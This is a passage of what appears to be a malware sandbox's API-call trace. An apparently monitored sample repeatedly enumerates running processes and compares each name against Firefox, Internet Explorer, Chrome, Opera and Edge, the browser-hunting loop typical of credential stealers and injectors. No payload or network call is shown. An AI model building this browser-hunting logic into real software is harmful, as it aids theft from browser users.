(lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0162.455] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0162.456] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.456] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.456] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.456] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.456] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.456] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.456] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.456] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.457] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0162.457] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0162.457] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0162.457] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0162.457] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.457] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0162.457] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0162.457] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0162.457] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0162.457] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0162.457] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.457] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0162.458] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0162.458] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0162.458] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0162.458] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0162.458] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.458] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0162.458] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0162.459] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0162.459] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0162.459] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0162.459] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.459] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0162.459] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0162.459] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0162.459] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0162.459] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0162.459] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.459] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0162.460] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0162.460] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0162.460] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0162.460] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0162.460] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.460] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0162.460] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0162.460] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0162.460] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0162.460] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0162.460] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.460] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0162.461] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0162.461] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0162.461] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0162.461] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0162.461] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.461] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0162.462] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0162.462] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0162.462] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0162.462] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0162.462] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.462] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0162.462] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0162.462] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0162.462] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0162.462] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0162.462] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.462] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0162.463] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0162.463] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0162.463] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0162.463] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0162.463] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.463] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0162.463] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0162.463] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0162.463] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0162.463] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0162.463] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.464] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0162.464] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0162.464] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0162.464] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0162.464] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0162.464] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.464] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0162.465] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0162.465] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0162.465] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0162.465] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0162.465] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.465] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0162.465] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0162.465] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0162.465] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0162.465] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0162.465] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.465] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0162.466] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0162.466] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0162.466] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0162.466] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0162.466] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.466] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0162.466] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0162.466] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0162.467] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0162.467] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0162.467] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.467] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0162.467] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0162.467] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0162.467] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0162.467] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0162.467] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.467] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0162.468] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0162.468] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0162.468] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0162.468] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0162.468] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.468] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0162.469] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0162.469] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0162.469] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0162.469] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0162.469] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.469] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0162.469] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0162.469] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0162.469] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0162.469] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0162.469] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.469] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0162.470] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0162.470] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0162.470] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0162.470] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0162.470] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.470] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0162.470] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0162.470] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0162.470] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0162.470] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0162.470] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.471] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.471] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.471] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.471] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.471] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.471] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.471] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0162.472] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0162.472] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0162.472] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0162.472] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0162.472] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.472] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.472] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.472] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.472] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.472] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.472] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.472] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.473] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0162.473] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0162.473] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0162.473] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0162.473] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.473] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.473] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.473] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.474] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.474] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.474] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.474] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.474] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0162.474] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0162.474] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0162.474] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0162.474] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.474] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0162.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0162.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0162.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0162.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.475] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0162.475] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0162.475] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0162.475] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0162.475] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0162.475] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.475] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.476] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0162.476] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0162.476] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0162.476] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0162.476] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.476] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.477] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0162.477] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.477] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0162.478] CloseHandle (hObject=0xe8) returned 1 [0162.478] Sleep (dwMilliseconds=0x3e8) [0163.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0163.624] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 